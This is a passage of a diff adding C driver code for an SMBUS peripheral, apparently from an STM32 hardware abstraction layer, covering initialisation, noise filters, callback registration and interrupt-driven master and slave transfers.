+ /* Init the low level hardware : GPIO, CLOCK, NVIC */ +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + /* Init the SMBUS Callback settings */ + hsmbus->MasterTxCpltCallback = HAL_SMBUS_MasterTxCpltCallback; /* Legacy weak MasterTxCpltCallback */ + hsmbus->MasterRxCpltCallback = HAL_SMBUS_MasterRxCpltCallback; /* Legacy weak MasterRxCpltCallback */ + hsmbus->SlaveTxCpltCallback = HAL_SMBUS_SlaveTxCpltCallback; /* Legacy weak SlaveTxCpltCallback */ + hsmbus->SlaveRxCpltCallback = HAL_SMBUS_SlaveRxCpltCallback; /* Legacy weak SlaveRxCpltCallback */ + hsmbus->ListenCpltCallback = HAL_SMBUS_ListenCpltCallback; /* Legacy weak ListenCpltCallback */ + hsmbus->ErrorCallback = HAL_SMBUS_ErrorCallback; /* Legacy weak ErrorCallback */ + hsmbus->AbortCpltCallback = HAL_SMBUS_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ + hsmbus->AddrCallback = HAL_SMBUS_AddrCallback; /* Legacy weak AddrCallback */ + + if (hsmbus->MspInitCallback == NULL) + { + hsmbus->MspInitCallback = HAL_SMBUS_MspInit; /* Legacy weak MspInit */ + } + + /* Init the low level hardware : GPIO, CLOCK, NVIC */ + hsmbus->MspInitCallback(hsmbus); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC */ + HAL_SMBUS_MspInit(hsmbus); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + } + + hsmbus->State = HAL_SMBUS_STATE_BUSY; + + /* Disable the selected SMBUS peripheral */ + __HAL_SMBUS_DISABLE(hsmbus); + + /* Get PCLK1 frequency */ + pclk1 = HAL_RCC_GetPCLK1Freq(); + + /* Calculate frequency range */ + freqrange = SMBUS_FREQRANGE(pclk1); + + /*---------------------------- SMBUSx CR2 Configuration ----------------------*/ + /* Configure SMBUSx: Frequency range */ + MODIFY_REG(hsmbus->Instance->CR2, I2C_CR2_FREQ, freqrange); + + /*---------------------------- SMBUSx TRISE Configuration --------------------*/ + /* Configure SMBUSx: Rise Time */ + MODIFY_REG(hsmbus->Instance->TRISE, I2C_TRISE_TRISE, SMBUS_RISE_TIME(freqrange)); + + /*---------------------------- SMBUSx CCR Configuration ----------------------*/ + /* Configure SMBUSx: Speed */ + MODIFY_REG(hsmbus->Instance->CCR, (I2C_CCR_FS | I2C_CCR_DUTY | I2C_CCR_CCR), SMBUS_SPEED_STANDARD(pclk1, hsmbus->Init.ClockSpeed)); + + /*---------------------------- SMBUSx CR1 Configuration ----------------------*/ + /* Configure SMBUSx: Generalcall , PEC , Peripheral mode and NoStretch mode */ + MODIFY_REG(hsmbus->Instance->CR1, (I2C_CR1_NOSTRETCH | I2C_CR1_ENGC | I2C_CR1_ENPEC | I2C_CR1_ENARP | I2C_CR1_SMBTYPE | I2C_CR1_SMBUS), (hsmbus->Init.NoStretchMode | hsmbus->Init.GeneralCallMode | hsmbus->Init.PacketErrorCheckMode | hsmbus->Init.PeripheralMode)); + + /*---------------------------- SMBUSx OAR1 Configuration ---------------------*/ + /* Configure SMBUSx: Own Address1 and addressing mode */ + MODIFY_REG(hsmbus->Instance->OAR1, (I2C_OAR1_ADDMODE | I2C_OAR1_ADD8_9 | I2C_OAR1_ADD1_7 | I2C_OAR1_ADD0), (hsmbus->Init.AddressingMode | hsmbus->Init.OwnAddress1)); + + /*---------------------------- SMBUSx OAR2 Configuration ---------------------*/ + /* Configure SMBUSx: Dual mode and Own Address2 */ + MODIFY_REG(hsmbus->Instance->OAR2, (I2C_OAR2_ENDUAL | I2C_OAR2_ADD2), (hsmbus->Init.DualAddressMode | hsmbus->Init.OwnAddress2)); +#if defined(I2C_FLTR_ANOFF) + /*---------------------------- SMBUSx FLTR Configuration ------------------------*/ + /* Configure SMBUSx: Analog noise filter */ + SET_BIT(hsmbus->Instance->FLTR, hsmbus->Init.AnalogFilter); +#endif + + /* Enable the selected SMBUS peripheral */ + __HAL_SMBUS_ENABLE(hsmbus); + + hsmbus->ErrorCode = HAL_SMBUS_ERROR_NONE; + hsmbus->State = HAL_SMBUS_STATE_READY; + hsmbus->PreviousState = SMBUS_STATE_NONE; + hsmbus->Mode = HAL_SMBUS_MODE_NONE; + hsmbus->XferPEC = 0x00; + + return HAL_OK; +} + +/** + * @brief DeInitializes the SMBUS peripheral. + * @param hsmbus pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_DeInit(SMBUS_HandleTypeDef *hsmbus) +{ + /* Check the SMBUS handle allocation */ + if (hsmbus == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_SMBUS_ALL_INSTANCE(hsmbus->Instance)); + + hsmbus->State = HAL_SMBUS_STATE_BUSY; + + /* Disable the SMBUS Peripheral Clock */ + __HAL_SMBUS_DISABLE(hsmbus); + +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + if (hsmbus->MspDeInitCallback == NULL) + { + hsmbus->MspDeInitCallback = HAL_SMBUS_MspDeInit; /* Legacy weak MspDeInit */ + } + + /* DeInit the low level hardware: GPIO, CLOCK, NVIC */ + hsmbus->MspDeInitCallback(hsmbus); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC */ + HAL_SMBUS_MspDeInit(hsmbus); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + + hsmbus->ErrorCode = HAL_SMBUS_ERROR_NONE; + hsmbus->State = HAL_SMBUS_STATE_RESET; + hsmbus->PreviousState = SMBUS_STATE_NONE; + hsmbus->Mode = HAL_SMBUS_MODE_NONE; + + /* Release Lock */ + __HAL_UNLOCK(hsmbus); + + return HAL_OK; +} + +/** + * @brief Initialize the SMBUS MSP. + * @param hsmbus pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS + * @retval None + */ +__weak void HAL_SMBUS_MspInit(SMBUS_HandleTypeDef *hsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsmbus); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_SMBUS_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitialize the SMBUS MSP. + * @param hsmbus pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS + * @retval None + */ +__weak void HAL_SMBUS_MspDeInit(SMBUS_HandleTypeDef *hsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsmbus); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_SMBUS_MspDeInit could be implemented in the user file + */ +} + +#if defined(I2C_FLTR_ANOFF)&&defined(I2C_FLTR_DNF) +/** + * @brief Configures SMBUS Analog noise filter. + * @param hsmbus pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUSx peripheral. + * @param AnalogFilter new state of the Analog filter. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_ConfigAnalogFilter(SMBUS_HandleTypeDef *hsmbus, uint32_t AnalogFilter) +{ + /* Check the parameters */ + assert_param(IS_SMBUS_ALL_INSTANCE(hsmbus->Instance)); + assert_param(IS_SMBUS_ANALOG_FILTER(AnalogFilter)); + + if (hsmbus->State == HAL_SMBUS_STATE_READY) + { + hsmbus->State = HAL_SMBUS_STATE_BUSY; + + /* Disable the selected SMBUS peripheral */ + __HAL_SMBUS_DISABLE(hsmbus); + + /* Reset SMBUSx ANOFF bit */ + hsmbus->Instance->FLTR &= ~(I2C_FLTR_ANOFF); + + /* Disable the analog filter */ + hsmbus->Instance->FLTR |= AnalogFilter; + + __HAL_SMBUS_ENABLE(hsmbus); + + hsmbus->State = HAL_SMBUS_STATE_READY; + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Configures SMBUS Digital noise filter. + * @param hsmbus pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUSx peripheral. + * @param DigitalFilter Coefficient of digital noise filter between 0x00 and 0x0F. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_ConfigDigitalFilter(SMBUS_HandleTypeDef *hsmbus, uint32_t DigitalFilter) +{ + uint16_t tmpreg = 0; + + /* Check the parameters */ + assert_param(IS_SMBUS_ALL_INSTANCE(hsmbus->Instance)); + assert_param(IS_SMBUS_DIGITAL_FILTER(DigitalFilter)); + + if (hsmbus->State == HAL_SMBUS_STATE_READY) + { + hsmbus->State = HAL_SMBUS_STATE_BUSY; + + /* Disable the selected SMBUS peripheral */ + __HAL_SMBUS_DISABLE(hsmbus); + + /* Get the old register value */ + tmpreg = hsmbus->Instance->FLTR; + + /* Reset SMBUSx DNF bit [3:0] */ + tmpreg &= ~(I2C_FLTR_DNF); + + /* Set SMBUSx DNF coefficient */ + tmpreg |= DigitalFilter; + + /* Store the new register value */ + hsmbus->Instance->FLTR = tmpreg; + + __HAL_SMBUS_ENABLE(hsmbus); + + hsmbus->State = HAL_SMBUS_STATE_READY; + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} +#endif +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User SMBUS Callback + * To be used instead of the weak predefined callback + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_SMBUS_MASTER_TX_COMPLETE_CB_ID Master Tx Transfer completed callback ID + * @arg @ref HAL_SMBUS_MASTER_RX_COMPLETE_CB_ID Master Rx Transfer completed callback ID + * @arg @ref HAL_SMBUS_SLAVE_TX_COMPLETE_CB_ID Slave Tx Transfer completed callback ID + * @arg @ref HAL_SMBUS_SLAVE_RX_COMPLETE_CB_ID Slave Rx Transfer completed callback ID + * @arg @ref HAL_SMBUS_LISTEN_COMPLETE_CB_ID Listen Complete callback ID + * @arg @ref HAL_SMBUS_ERROR_CB_ID Error callback ID + * @arg @ref HAL_SMBUS_ABORT_CB_ID Abort callback ID + * @arg @ref HAL_SMBUS_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_SMBUS_MSPDEINIT_CB_ID MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_RegisterCallback(SMBUS_HandleTypeDef *hsmbus, HAL_SMBUS_CallbackIDTypeDef CallbackID, pSMBUS_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hsmbus); + + if (HAL_SMBUS_STATE_READY == hsmbus->State) + { + switch (CallbackID) + { + case HAL_SMBUS_MASTER_TX_COMPLETE_CB_ID : + hsmbus->MasterTxCpltCallback = pCallback; + break; + + case HAL_SMBUS_MASTER_RX_COMPLETE_CB_ID : + hsmbus->MasterRxCpltCallback = pCallback; + break; + + case HAL_SMBUS_SLAVE_TX_COMPLETE_CB_ID : + hsmbus->SlaveTxCpltCallback = pCallback; + break; + + case HAL_SMBUS_SLAVE_RX_COMPLETE_CB_ID : + hsmbus->SlaveRxCpltCallback = pCallback; + break; + + case HAL_SMBUS_LISTEN_COMPLETE_CB_ID : + hsmbus->ListenCpltCallback = pCallback; + break; + + case HAL_SMBUS_ERROR_CB_ID : + hsmbus->ErrorCallback = pCallback; + break; + + case HAL_SMBUS_ABORT_CB_ID : + hsmbus->AbortCpltCallback = pCallback; + break; + + case HAL_SMBUS_MSPINIT_CB_ID : + hsmbus->MspInitCallback = pCallback; + break; + + case HAL_SMBUS_MSPDEINIT_CB_ID : + hsmbus->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_SMBUS_STATE_RESET == hsmbus->State) + { + switch (CallbackID) + { + case HAL_SMBUS_MSPINIT_CB_ID : + hsmbus->MspInitCallback = pCallback; + break; + + case HAL_SMBUS_MSPDEINIT_CB_ID : + hsmbus->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hsmbus); + return status; +} + +/** + * @brief Unregister an SMBUS Callback + * SMBUS callback is redirected to the weak predefined callback + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * This parameter can be one of the following values: + * @arg @ref HAL_SMBUS_MASTER_TX_COMPLETE_CB_ID Master Tx Transfer completed callback ID + * @arg @ref HAL_SMBUS_MASTER_RX_COMPLETE_CB_ID Master Rx Transfer completed callback ID + * @arg @ref HAL_SMBUS_SLAVE_TX_COMPLETE_CB_ID Slave Tx Transfer completed callback ID + * @arg @ref HAL_SMBUS_SLAVE_RX_COMPLETE_CB_ID Slave Rx Transfer completed callback ID + * @arg @ref HAL_SMBUS_LISTEN_COMPLETE_CB_ID Listen Complete callback ID + * @arg @ref HAL_SMBUS_ERROR_CB_ID Error callback ID + * @arg @ref HAL_SMBUS_ABORT_CB_ID Abort callback ID + * @arg @ref HAL_SMBUS_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_SMBUS_MSPDEINIT_CB_ID MspDeInit callback ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_UnRegisterCallback(SMBUS_HandleTypeDef *hsmbus, HAL_SMBUS_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hsmbus); + + if (HAL_SMBUS_STATE_READY == hsmbus->State) + { + switch (CallbackID) + { + case HAL_SMBUS_MASTER_TX_COMPLETE_CB_ID : + hsmbus->MasterTxCpltCallback = HAL_SMBUS_MasterTxCpltCallback; /* Legacy weak MasterTxCpltCallback */ + break; + + case HAL_SMBUS_MASTER_RX_COMPLETE_CB_ID : + hsmbus->MasterRxCpltCallback = HAL_SMBUS_MasterRxCpltCallback; /* Legacy weak MasterRxCpltCallback */ + break; + + case HAL_SMBUS_SLAVE_TX_COMPLETE_CB_ID : + hsmbus->SlaveTxCpltCallback = HAL_SMBUS_SlaveTxCpltCallback; /* Legacy weak SlaveTxCpltCallback */ + break; + + case HAL_SMBUS_SLAVE_RX_COMPLETE_CB_ID : + hsmbus->SlaveRxCpltCallback = HAL_SMBUS_SlaveRxCpltCallback; /* Legacy weak SlaveRxCpltCallback */ + break; + + case HAL_SMBUS_LISTEN_COMPLETE_CB_ID : + hsmbus->ListenCpltCallback = HAL_SMBUS_ListenCpltCallback; /* Legacy weak ListenCpltCallback */ + break; + + case HAL_SMBUS_ERROR_CB_ID : + hsmbus->ErrorCallback = HAL_SMBUS_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_SMBUS_ABORT_CB_ID : + hsmbus->AbortCpltCallback = HAL_SMBUS_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ + break; + + case HAL_SMBUS_MSPINIT_CB_ID : + hsmbus->MspInitCallback = HAL_SMBUS_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_SMBUS_MSPDEINIT_CB_ID : + hsmbus->MspDeInitCallback = HAL_SMBUS_MspDeInit; /* Legacy weak MspDeInit */ + break; + + default : + /* Update the error code */ + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_SMBUS_STATE_RESET == hsmbus->State) + { + switch (CallbackID) + { + case HAL_SMBUS_MSPINIT_CB_ID : + hsmbus->MspInitCallback = HAL_SMBUS_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_SMBUS_MSPDEINIT_CB_ID : + hsmbus->MspDeInitCallback = HAL_SMBUS_MspDeInit; /* Legacy weak MspDeInit */ + break; + + default : + /* Update the error code */ + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hsmbus); + return status; +} + +/** + * @brief Register the Slave Address Match SMBUS Callback + * To be used instead of the weak HAL_SMBUS_AddrCallback() predefined callback + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @param pCallback pointer to the Address Match Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_RegisterAddrCallback(SMBUS_HandleTypeDef *hsmbus, pSMBUS_AddrCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hsmbus); + + if (HAL_SMBUS_STATE_READY == hsmbus->State) + { + hsmbus->AddrCallback = pCallback; + } + else + { + /* Update the error code */ + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hsmbus); + return status; +} + +/** + * @brief UnRegister the Slave Address Match SMBUS Callback + * Info Ready SMBUS Callback is redirected to the weak HAL_SMBUS_AddrCallback() predefined callback + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_UnRegisterAddrCallback(SMBUS_HandleTypeDef *hsmbus) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hsmbus); + + if (HAL_SMBUS_STATE_READY == hsmbus->State) + { + hsmbus->AddrCallback = HAL_SMBUS_AddrCallback; /* Legacy weak AddrCallback */ + } + else + { + /* Update the error code */ + hsmbus->ErrorCode |= HAL_SMBUS_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hsmbus); + return status; +} + +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup SMBUS_Exported_Functions_Group2 Input and Output operation functions + * @brief Data transfers functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to manage the SMBUS data + transfers. + + (#) Blocking mode function to check if device is ready for usage is : + (++) HAL_SMBUS_IsDeviceReady() + + (#) There is only one mode of transfer: + (++) Non Blocking mode : The communication is performed using Interrupts. + These functions return the status of the transfer startup. + The end of the data processing will be indicated through the + dedicated SMBUS IRQ when using Interrupt mode. + + (#) Non Blocking mode functions with Interrupt are : + (++) HAL_SMBUS_Master_Transmit_IT() + (++) HAL_SMBUS_Master_Receive_IT() + (++) HAL_SMBUS_Master_Abort_IT() + (++) HAL_SMBUS_Slave_Transmit_IT() + (++) HAL_SMBUS_Slave_Receive_IT() + (++) HAL_SMBUS_EnableAlert_IT() + (++) HAL_SMBUS_DisableAlert_IT() + + (#) A set of Transfer Complete Callbacks are provided in No_Blocking mode: + (++) HAL_SMBUS_MasterTxCpltCallback() + (++) HAL_SMBUS_MasterRxCpltCallback() + (++) HAL_SMBUS_SlaveTxCpltCallback() + (++) HAL_SMBUS_SlaveRxCpltCallback() + (++) HAL_SMBUS_AddrCallback() + (++) HAL_SMBUS_ListenCpltCallback() + (++) HAL_SMBUS_ErrorCallback() + (++) HAL_SMBUS_AbortCpltCallback() + +@endverbatim + * @{ + */ + +/** + * @brief Transmits in master mode an amount of data in blocking mode. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @param DevAddress Target device address The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_Master_Transmit_IT(SMBUS_HandleTypeDef *hsmbus, uint16_t DevAddress, uint8_t *pData, uint16_t Size, uint32_t XferOptions) +{ + uint32_t count = 0x00U; + + /* Check the parameters */ + assert_param(IS_SMBUS_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (hsmbus->State == HAL_SMBUS_STATE_READY) + { + /* Check Busy Flag only if FIRST call of Master interface */ + if ((XferOptions == SMBUS_FIRST_AND_LAST_FRAME_NO_PEC) || (XferOptions == SMBUS_FIRST_AND_LAST_FRAME_WITH_PEC) || (XferOptions == SMBUS_FIRST_FRAME)) + { + /* Wait until BUSY flag is reset */ + count = SMBUS_TIMEOUT_BUSY_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + if (count-- == 0U) + { + hsmbus->PreviousState = SMBUS_STATE_NONE; + hsmbus->State = HAL_SMBUS_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hsmbus); + + return HAL_TIMEOUT; + } + } + while (__HAL_SMBUS_GET_FLAG(hsmbus, SMBUS_FLAG_BUSY) != RESET); + } + + /* Process Locked */ + __HAL_LOCK(hsmbus); + + /* Check if the SMBUS is already enabled */ + if ((hsmbus->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable SMBUS peripheral */ + __HAL_SMBUS_ENABLE(hsmbus); + } + + /* Disable Pos */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_POS); + + hsmbus->State = HAL_SMBUS_STATE_BUSY_TX; + hsmbus->ErrorCode = HAL_SMBUS_ERROR_NONE; + hsmbus->Mode = HAL_SMBUS_MODE_MASTER; + + /* Prepare transfer parameters */ + hsmbus->pBuffPtr = pData; + hsmbus->XferCount = Size; + hsmbus->XferOptions = XferOptions; + hsmbus->XferSize = hsmbus->XferCount; + hsmbus->Devaddress = DevAddress; + + /* Generate Start */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_START); + + /* Process Unlocked */ + __HAL_UNLOCK(hsmbus); + + /* Note : The SMBUS interrupts must be enabled after unlocking current process + to avoid the risk of hsmbus interrupt handle execution before current + process unlock */ + + /* Enable EVT, BUF and ERR interrupt */ + __HAL_SMBUS_ENABLE_IT(hsmbus, SMBUS_IT_EVT | SMBUS_IT_BUF | SMBUS_IT_ERR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} +/** + * @brief Receive in master/host SMBUS mode an amount of data in non blocking mode with Interrupt. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @param DevAddress Target device address The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref SMBUS_XferOptions_definition + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_Master_Receive_IT(SMBUS_HandleTypeDef *hsmbus, uint16_t DevAddress, uint8_t *pData, uint16_t Size, uint32_t XferOptions) +{ + __IO uint32_t count = 0U; + + /* Check the parameters */ + assert_param(IS_SMBUS_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (hsmbus->State == HAL_SMBUS_STATE_READY) + { + /* Check Busy Flag only if FIRST call of Master interface */ + if ((XferOptions == SMBUS_FIRST_AND_LAST_FRAME_NO_PEC) || (XferOptions == SMBUS_FIRST_AND_LAST_FRAME_WITH_PEC) || (XferOptions == SMBUS_FIRST_FRAME)) + { + /* Wait until BUSY flag is reset */ + count = SMBUS_TIMEOUT_BUSY_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + if (count-- == 0U) + { + hsmbus->PreviousState = SMBUS_STATE_NONE; + hsmbus->State = HAL_SMBUS_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hsmbus); + + return HAL_TIMEOUT; + } + } + while (__HAL_SMBUS_GET_FLAG(hsmbus, SMBUS_FLAG_BUSY) != RESET); + } + + /* Process Locked */ + __HAL_LOCK(hsmbus); + + /* Check if the SMBUS is already enabled */ + if ((hsmbus->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable SMBUS peripheral */ + __HAL_SMBUS_ENABLE(hsmbus); + } + + /* Disable Pos */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_POS); + + hsmbus->State = HAL_SMBUS_STATE_BUSY_RX; + hsmbus->ErrorCode = HAL_SMBUS_ERROR_NONE; + hsmbus->Mode = HAL_SMBUS_MODE_MASTER; + + /* Prepare transfer parameters */ + hsmbus->pBuffPtr = pData; + hsmbus->XferCount = Size; + hsmbus->XferOptions = XferOptions; + hsmbus->XferSize = hsmbus->XferCount; + hsmbus->Devaddress = DevAddress; + + if ((hsmbus->PreviousState == SMBUS_STATE_MASTER_BUSY_TX) || (hsmbus->PreviousState == SMBUS_STATE_NONE)) + { + /* Generate Start condition if first transfer */ + if ((XferOptions == SMBUS_NEXT_FRAME) || (XferOptions == SMBUS_FIRST_AND_LAST_FRAME_NO_PEC) || (XferOptions == SMBUS_FIRST_AND_LAST_FRAME_WITH_PEC) || (XferOptions == SMBUS_FIRST_FRAME) || (XferOptions == SMBUS_NO_OPTION_FRAME)) + { + /* Enable Acknowledge */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + + /* Generate Start */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_START); + } + + if ((XferOptions == SMBUS_LAST_FRAME_NO_PEC) || (XferOptions == SMBUS_LAST_FRAME_WITH_PEC)) + { + if (hsmbus->PreviousState == SMBUS_STATE_NONE) + { + /* Enable Acknowledge */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + } + + if (hsmbus->PreviousState == SMBUS_STATE_MASTER_BUSY_TX) + { + /* Enable Acknowledge */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + + /* Generate Start */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_START); + } + } + } + + + + /* Process Unlocked */ + __HAL_UNLOCK(hsmbus); + + /* Note : The SMBUS interrupts must be enabled after unlocking current process + to avoid the risk of SMBUS interrupt handle execution before current + process unlock */ + + /* Enable EVT, BUF and ERR interrupt */ + __HAL_SMBUS_ENABLE_IT(hsmbus, SMBUS_IT_EVT | SMBUS_IT_BUF | SMBUS_IT_ERR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Abort a master/host SMBUS process communication with Interrupt. + * @note This abort can be called only if state is ready + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @param DevAddress Target device address The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_Master_Abort_IT(SMBUS_HandleTypeDef *hsmbus, uint16_t DevAddress) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(DevAddress); + if (hsmbus->Init.PeripheralMode == SMBUS_PERIPHERAL_MODE_SMBUS_HOST) + { + /* Process Locked */ + __HAL_LOCK(hsmbus); + + hsmbus->ErrorCode = HAL_SMBUS_ERROR_NONE; + + hsmbus->PreviousState = SMBUS_STATE_NONE; + hsmbus->State = HAL_SMBUS_STATE_ABORT; + + + /* Disable Acknowledge */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + + /* Generate Stop */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_STOP); + + hsmbus->XferCount = 0U; + + /* Disable EVT, BUF and ERR interrupt */ + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_EVT | SMBUS_IT_BUF | SMBUS_IT_ERR); + + /* Process Unlocked */ + __HAL_UNLOCK(hsmbus); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ + SMBUS_ITError(hsmbus); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + + +/** + * @brief Transmit in slave/device SMBUS mode an amount of data in non blocking mode with Interrupt. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref SMBUS_XferOptions_definition + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_Slave_Transmit_IT(SMBUS_HandleTypeDef *hsmbus, uint8_t *pData, uint16_t Size, uint32_t XferOptions) +{ + /* Check the parameters */ + assert_param(IS_SMBUS_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if (hsmbus->State == HAL_SMBUS_STATE_LISTEN) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hsmbus); + + /* Check if the SMBUS is already enabled */ + if ((hsmbus->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable SMBUS peripheral */ + __HAL_SMBUS_ENABLE(hsmbus); + } + + /* Disable Pos */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_POS); + + hsmbus->State = HAL_SMBUS_STATE_BUSY_TX_LISTEN; + hsmbus->ErrorCode = HAL_SMBUS_ERROR_NONE; + hsmbus->Mode = HAL_SMBUS_MODE_SLAVE; + + /* Prepare transfer parameters */ + hsmbus->pBuffPtr = pData; + hsmbus->XferCount = Size; + hsmbus->XferOptions = XferOptions; + hsmbus->XferSize = hsmbus->XferCount; + + /* Clear ADDR flag after prepare the transfer parameters */ + /* This action will generate an acknowledge to the 